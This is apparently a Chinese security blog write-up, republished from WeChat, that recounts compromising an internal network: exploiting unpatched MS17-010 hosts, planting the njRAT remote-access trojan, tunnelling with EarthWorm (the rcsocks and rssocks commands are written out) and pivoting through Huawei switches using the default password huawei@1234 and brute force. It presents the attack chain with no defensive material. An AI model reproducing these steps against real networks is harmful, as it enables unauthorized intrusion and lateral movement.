在对内网进行 ms17-010
扫描时,发现 2 台之前没有出现过且没有打补丁的主机,于是,尝试了一波
kali 主机在扫描时发现 2 台之前没有出现过且没有打补丁的主机
尝试打了一波
然后种了个 njrat
翻文件的时候发现了点配置文件
down
下来解压后发现是交换机的配置文件,于是有了一个大胆的想法
查看了被控主机的网络连接后,发现一个地址无法 ping
通,TCP
包也无法到达,推测做了 ACL
于是在被控机上搭了 earthworm
做转发
本机执行
ew -s rcsocks -l 本地代理端口 -e 远端连接端口
被控机执行
ew -s rssocks -d 主控机IP -e 远端连接端口
然后开启 proxifier
的代理功能,成功访问了那个系统,但这不是主要目的
在咨询了好哥们后,他建议尝试搞搞交换机看看
在对 10.2.66/24
网段扫描后发现 10.2.66.254
开放了 80
和 23
端口,尝试 xshell
连接
成功使用 huawei
密码 huawei@1234
连接,继续翻上级路由
发现了 10.2.20.1
继续 telnet
继续翻
发现 10.2.20.58
继续翻,翻到 10.4.0.1
继续 telnet
另外发现此时可以 ping 通 10.4.0.1 这台交换机
于是乎,扔浏览器打开看看
拿下后将本次收集到的密码与巡风扫描到的 telnet 主机进行爆破后发现了更多的交换机。。。。。。
作者:Sp4ce
↑↑↑长按图片识别二维码关註↑↑↑
原文始发于微信公众号(全栈网络空间安全):复盘从一个监控主机到核心路由沦陷
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论